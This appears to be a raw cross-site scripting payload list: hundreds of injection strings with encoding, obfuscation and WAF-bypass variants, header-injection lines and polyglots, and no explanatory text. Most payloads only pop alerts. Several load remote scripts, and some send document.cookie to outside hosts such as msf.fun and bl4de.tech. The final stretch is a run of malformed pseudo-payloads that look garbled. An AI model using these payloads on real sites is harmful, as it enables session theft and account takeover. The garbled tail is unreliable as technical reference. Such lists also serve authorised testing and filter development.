%";eval(unescape(location))//#%0Aprompt(0)
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT
"><script&#x00000003B;alert&#x000000028;1&#x000000029;&#x00000003B;</script>
javascript&#x00000003A;alert&#x000000028;2&#x000000029;&#x00000003B;
"><img src=1 onerror=alert&#x000000028;1&#x000000029;&#x00000003B;">
";eval(unescape(location))//# %0Aalert(0)
¼script¾alert(¢XSS¢)¼/script¾
<img src=1 onerror=alert(1)>
&#x3C;img src=1 onerror=alert(1)&#x3E;
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
‘ onfocus=’alert(1)’
‘ onfocus=’alert(1)’ autofocus=’
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
‘ onmouseover=’alert(1)’
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
<svg%20oNinad=1%20onload=alert(document.cookie)>
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f
%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<a&#32;href&#61;&#91;&#00;&#93;"&#00;
onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/
***/</script /***/
<script>var
a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTw
vc2NyaXB0Pg==";http://a.click();</script>
%script%alert(CXSS¢)4/script%
<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">
STYLE="xss:expr/*XSS*/ession(alert('XSS')">
<XSS STYLE="Xss:expressionfalert('XSS'))">
xss:&#101;x&#x2F; *XSS*//*//pression(alert("XSS"))'>
"<svg onload=alert (1)> " ;
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
#<img src=1 onerror=alert(1)>
<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>
<img src="java script:al ert('Successful XSS')">
<img src="java script:al ert('Successful XSS')">
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>
<img dynsrc="javascript:alert('Successful XSS')">
<img src=`javascript:alert("The name is 'XSS'")`>
<body background="javascript:alert('Successful XSS')">
"><input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/XSS/)>
'onfocus='alert(1)' autofocus='
<xml onreadystatechange=alert(1)>
&fileName=')},1000);alert("XSS`);//
fileName=')},1000);alert("XSS`);//
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<div style="background-image:url(javascript:alert('Successful XSS'))">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script>window['alert'](document['domain'])</script>
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/
xss.js';document.body.appendChild(s);"
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
";a=prompt,a()//
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
\'/alert(1)//
\'}alert(1);{//
\;alert(1)//
\\;alert(1)//
\’-alert(1)//
\’-alert(1)};{//
\’}alert(1);{//
\”;alert(1);//
‘)alert(1);//
javascript:alert(1)
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm&#0000000040document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)

"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)>
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=

- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
'"><img src=x onerror=alert("xss!")>.pdf
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><track/onerror='confirm`1`'>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]
['domain'])%2F%2F
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
/alert(1)}//\
<svg/onload=location=‘javas’%2B‘cript:’%2B
‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)
"'`//><Svg+Only%3d1+OnLoad
%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
<SCRIPT>location=%27javasCript:alert\x281\x29%27</SCRIPT>
';k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
*/alert(1)/*
/alert(1)//\
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;&sol;(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow
%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(VulneravelXSS
%26%2300000000000000000041//
"><iframe%20src="http://google.com"%%203E
"><img src=1 onerror=alert(1)>.gif
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
"><img src=x onerror=prompt(1);>
"><img src=x onerror=window.open('https://www.google.com/');>
"><link rel=import
href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><script src=//brutelogic.com.br&sol;1.js&num;
"><script src=data:&comma;alert(1)//
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
"><svg onload=alert(1)//
"><svg/onload=alert(/XSS/)
"><svg/onload=alert(String.fromCharCode(88,83,83))>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\
><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/) type=submit>'-->"
></script><script>alert(1)</script>"><img/id="confirm&lpar;
1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http:
//i.imgur.com/P8mL8.jpg">
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\
X55.is?1=18369/.source))//>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
<input type="image" src="javascript:alert('Successful XSS')">
%26%23x2f%3B%26%23x2f%3Br4y.pw
"/><iMg SrC="x" oNeRRor="alert(document.cookie);">
svg/onload=alert(document.cookie)[email protected]
<img src="non-existent-image.jpg" onerror="alert(document.cookie);" />
[alert][0].call(this,1)
&lt;script&gt;alert(1)&lt;/script&gt;
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
<details/open/ontoggle=alert()>
<details/open/ontoggle=(confirm)()//
";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\
145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\15
3\75\42\51\51”)();var+test="
”al”;b=”ert”;self[a+b]();
a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)
();
"><svg%20onload=alert%26%230000000040"1")>
<img/src=x onError="`${x}`;alert(`XSS`);">
-top['al\x65rt']('xss')-
<svg/on%20onload=alert(1)>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String))
{while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\
w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\
b','g'),k[c])}}return p}('0:2(1)',3,3,'javascript||alert'.split('|'),0,{}))
_0x68087f:alert(0x1);
/?xss=500); alert(document.cookie);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(#javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<?php echo('<SCR'); echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\
*)src/i
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<img
onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5j
b29raWU='))">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
"><img src=1 onmouseleave=print()>
<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;
&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<IMG SRC="`<javascript:alert>`('XSS')"
</script><script>alert('XSS');</script>
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
<BODY BACKGROUND="javascript:alert('XSS')">
‘;alert(123);t=’
“;alert(123);t=”
‘>alert(154)</script><script/154=’
*/alert(155)</script><script>/*
*/alert(156)”>’onload=”/*<svg/156=’
`-alert(158)”>’onload=”`<svg/158=’
<alert(192)<! — onmouseover=location=innerHTML+outerHTML>javascript:192/*00000*/
alert(1)
/alert`2`/i
‘-alert(79)-’
alert = a\u006cer\u0074
';alert(1);function myFunc(){}'
“])},alert(1));(function xss() {//
“alert(1)” instanceof [];
<IMG DYNSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image:
url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<svg/onload=alert('XSS')>
<svg/onload=window["al"+"ert"]1337>
&quot;&gt;&lt;svg onload=alert&amp;amp;#x00000040&quot;1&quot;&gt;
&lt;svg onload=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;
&lt;svg/onload=&#39;alert&amp;#40 23 &amp;#41;&#39;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x2F;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;amp;#x27;&#x00000040&quot;1&quot;&gt;
&rdquo;&gt;&lt;svg onload=alert&amp;#000000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;SVG
ONLOAD=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(&amp;#x64&amp;#x6f&amp;#x63&amp
;#x75&amp;#x6d&amp;#x65&amp;#x6e&amp;#x74&amp;#x2e&amp;#x64&amp;#x6f&amp;#x6d&amp;#
x61&amp;#x69&amp;#x6e)&gt;
PHN2ZyBvbmxvYWQ9YWxlcnQmYWxlcnQoMjMgKT4=
PHN2Zy9vbmxvYWQ9J2FsZXJ0Jz4=
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E
%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B
%28%26%231%3B%29%3E
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E
<BGSOUND SRC="javascript:alert('XSS');">
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x
onerror=javascript:alert(`cloudfrontbypass`)//'>
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<img/src/onerror="window[ al+/e/['ex + ec]'e'+'rt'](2)">
<svg/&parameter=onload=alert()>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' +
b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]'
src=x>
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/
&rpar;">XXXXX</a>
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/
html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
>><marquee loop=1 width=0 onfinish=alert(1)>
<a href=&#01javascript:alert(1)>
<a href=javascript&colon;confirm(1)>
<a href="jav%0Dascript&colon;alert(1)">
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
%uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e
<%tag onmouseover="alert('markitzeroday.com')">
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
%uff3c%uff73%uff6cr%uff69%uff63%uff74%uffe0alert('XSS')%uff3e
%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003ealert('XSS')%u003c%u002f
%u0073%u0063%u0072%u0069%u0070%u0074%u003e
1</Script><Script>1/*'/*\'/**//alert(1)//
1'"--><A HRef AutoFocus OnFocus=alert(1)//>
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uff3ealert('XSS')%uff3c%uff2f
%uff73%uff63%uff72%uff69%uff70%uff74%uff3e
%uff3cscript%uff3ealert('XSS')%uff3c/script%uff3e
%3Cscript%3Ealert('XSS')%3C/script%3E
<K ContentEditable AutoFocus OnFocus=alert(1)>
“AutoFocus OnFocus=alert(1)//
%u003Cscript%u003Ealert('XSS')%u003C/script%u003E
%253Cscript%253Ealert('XSS')%253C/script%253E
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uffe0alert('XSS')%uff3e
%u0025u0073u0063u0072u0069u0070u0074u003Ealert('XSS')%u003C%u002f
%u0073%u0063%u0072%u0069%u0070%u0074%u003E
&lt;script&gt;alert('XSS')&lt;/script&gt;
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
><img/onerror="javascript:alert(1%26%23x000000029;" src=x>
"><iframe/src="javascript:alert(1%26%23x00000000000000000000000000029;"></iframe>
window['alXert'.replace(/X/, '')](self['document']['cookie'])
#prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//
?&q&zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
<img/src=a onerror="window['alert'](document.cookie)"/>
<script src=//0-a.nl/conf.js></script>
<iframe src="javascript:alert('XSS')"></iframe>
<input type="text" value="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">
"><script>alert(1)</script><"
javascript:/*'-alert(1)-'*/
javascript:document.body.onclick=alert(1)
123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript
%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:var
img=document.createElement('img');img.src='';document.body.appendChild(img);img.one
rror=alert(1)
javascript:var
a=document.createElement('a');a.href='javascript:alert(1)';document.body.appendChil
d(a)
<script>alert('\u0031')</script>
&#x3C;script&#x3E;alert(1)&#x3C;&#x2F;script&#x3E;
" onfocus="alert(1)" autofocus="
<audio src="nonexistent.mp3" onerror="alert(1)"></audio>
?query=<img/src/onerror=alert(`ibro`)>
?query="><img src=x onerror=prompt(document.domain);>
en-us/Search#/?search="><img src=x onerror=prompt(document.domain);>
search?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q="><img src=x onerror=prompt(document.domain);>
redirect?url=javascript://%250Aalert(document.domain)
redirect.asp?url=javascript://%250Aalert(document.domain)
redirect.aspx?url=javascript://%250Aalert(document.domain)
q=javascript:alert(document.domain)
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
(A("onerror='alert`1`'testabcd))/
onerror="alert('XSS')"
pods/ppt.aspx?&fileName=')}, 1000); alert('xss')://
')}, 1000); alert('xss')://
<!--xss"><img src=x onerror=prompt(document.domain)>-->
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
'; x=eval; </script> <svg onpointerenter=alert()%20z= alert >
mrco24"type=image src onerror="alert(1)"
"><script akdk> prompt(document.domain)</script akdk>
foo?q=foo<script>alert('xss')<%2fscript>
Login.aspx?username=<img/src/onerror=alert(ibro)>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src="javascript:alert('XSS')" alt="Image">
<Img Src=OnXSS OnError=confirm(document.cookie)>
xxxxxxxxx'});});</script><script>prompt("PLEASE%20\nSUBSCRIBE")</script>
xxxxxxxxx'});}); </script><script>prompt ("PLEASE%20\nSUBSCRIBE") </script>
<img src=x onerror=print()>
javascript://'/</title></style></textarea></script>--><p"onclick=alert(123)//>*/
alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();
{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/
oNloAd=alert()//>\\x3e
`javascript://'/</title></style></textarea></script>--><p" %0D %0A
onclick=alert(123)//>/alert()/
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/
onmouseover=1/+/[*/[]/+alert(1)//'
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/
oNloAd=alert()//>\\x3e
javascript://'/</title></style></textarea></script>--><p" %0A
onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A
onclick=alert(123)//>*/alert()/*<img src=x
onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi
RS5'.substr(0,4)}}XXX<script>alert('XSS')
javascript://'/</title></style></textarea></script>--><p" %0D %0A
onclick=alert(123)//>*/alert()/*
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/
onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*/*/**/**/**/*%0D%0A%0d%0a*//**/oNclick-alert())//</style/</title/</
textarEa/</script/->\x3ciframe/<iframe/oNloAd-alert(1)//>\x3e
javascript://'/</title></style></textarea></script>--><p" %0D %0A
onclick=alert(123)//>*/alert()/*<img src=x
onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi
RS5'.substr(0,4)}}XXX<script>alert('XSS')<img src=x onerror='(function s(){var
i=new Image();i.src='http://bl4de.tech/bxss.php?
c='+document.cookie+';'+encodeURIComponent(location.href);document.body.append(i)})
()'/>#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/
oNloAd=alert()//>\\x3e
"onmouseover="alert(1)
"onmouseover=alert(1)
嘍嘊 Set-Cookie:whoami=thecyberneh 嘍嘊嘍嘊嘍嘊嘼 script 嘾 alert(1);嘼/script 嘾
嘍嘊 Set-Cookie:
whoami=thecyberneh%u2028%u2029XSS-Payload:%20<script>alert(1)</script>
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A
%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE%0D%0A
%0D%0A<script>%0D%0Aalert(1);%0D%0A</script>
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);
%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/
script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript
%3Ealert(1);%3C/script%3E
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C
%2Fscript%3E
<a"/onclick=(confirm)()>elcezeri!
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')
(Reflect.get(document,'coo'+'kie'))">
<svg onload=alert(document.domain)>
xss"><!--><svg/onload=alert(document.domain)>
"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
%3Cimg src='null' onerror=alert('spyerror')%3E
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<details/open=/Open/href=/https/www.scribd.com/data=;+ontoggle="(alert)(document.domain)
<object/data="javascript&colon;alert/**/(document.domain)">//
<iframe src="javasc%0a%0dript:alert(0);">
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E
&quot;&gt;&lt;img src=x onerror=prompt(&quot;XSS&quot;)&gt;
"\">" + "<img src=x onerror=prompt('XSS')>" + "\""
"><img&#x20;src=x&#x20;onerror=prompt('XSS')>"
"><body/onload="{x:onerror=alert};x"
%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e
"><img src=x onerrora=confirm() onerror=confirm(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
#"onmouseover="alert(1)
#javascript:alert(1)
"'><img src=q onerror=alert(1)>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
'-setTimeout`prompt\u0028document.domain\u0029`-'
}}}</script><script>alert(1)</script>
alert?.(document?.cookie)
<--`<img/src=`%20onerror=confirm``>%20--!>
{{&lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}
javascript:alert(1)?q=%26callback%3Durc_button.click%23
#&quot;-alert(1)}//
test+(<script>alert(0)</script>)@gmail.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
#&#39;-alert(1)-&#39;
&#39;-alert(1)-&#39;
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>'
<details open id="' &quot;'"ontoggle=alert(1)>
%22-alert('XSS')-%22
#&lt;img&#47;src&#47;onerror=alert(`ibro`)&gt;
#&lt;script&gt;prompt(document.domain)&lt;&#47;script&gt;
JavaScript://%250Dtop.confirm?.(1)//
1'"><!--><Base Href=//X55.is?
1'-top['con\146irm'](1)-'
/confirm(1)?.(1)//\
/confirm?.(1)//\
input.onfocus=alert(1)
';alert`1`//
alert(document.domain)
input.onfocus=function(){alert(1)}
input[0].onfocus=alert(1)
input.onfocus=alert'XSS'
document.domain;alert(1)
alert(documentdomain)
alert(1)alert(2)
print(alert(1))
alert('XSS')alert(2)
alert=documentdomain
input&onfocus='alert'1
alert'XSS'&print+input
alert=1&input=focus
alert'XSS'+print#1
input(onfocus)alert(1)
input[0].onfocus(alert(1))
input/on-focus(alert(1))
alert(document.domain)?input()
input[0].onfocus=alert(1);
input{onfocus}=alert(1)/
(alert(document.domain));
input.focus()/alert(1)
input[onfocus]=function(){alert('XSS')}
print(alert(document.domain))
input/onfocus=alert(1);
alert(document.domain)#print
alert'XSS'>input.focus()
{alert(document.domain)}&input()
input?onfocus=alert(1)
input[0](onfocus(alert(1)));
alert(document.domain)?"XSS"
[alert(1)];input()
input{onfocus}(alert(1))
alert[1](document.domain)?
input+onfocus(alert(1))
alert(document.domain)/print
input.onfocus{alert('XSS')}
alert(1)&document.domain
'input'[onfocus]=alert(1);
print(alert'XSS')
(input().onfocus)=alert(document.domain)
document.domain?print(alert(1))
input[alert]#(document.domain)
alert(document.domain)/input
input(onfocus)="alert(1)"
input{alert}(document.domain)
input.focus;alert[1]
input<alert(1)>print()
input(onfocus)[alert(document.domain)]
alert(input.focus)=1
[alert](document.domain)
document.domain;alert'XSS'
input(alert)=(document.domain)
{alert(document.domain)}/print
input().onfocus='alert(1)'
alert(1)?input=document.domain
input.alert(document.domain)
print[alert](document.domain);
<img src=x onerror='alert(1)'>
<input type="text" onfocus="alert('XSS')">
{alert:(1)}
</title><img src=x onerror=alert(1)>
document['domain'].alert(1)
'"><img src=x onerror="alert(1)">
a.href=javascript:alert(1)
img.src=x;img.onerror=alert(1)
input[0](onfocus=alert(1))
obj={alert:1};obj.alert=1
document[domain]=function(){alert(1)}
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<svg onload=eval`alert(1)`></svg>
<input autofocus onfocus=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>
input[0].onfocus=function(){alert(1)}
#"><img src=x onerror=prompt(document.domain);>
1')"<!--><Svg OnLoad=(confirm)(1)<!--
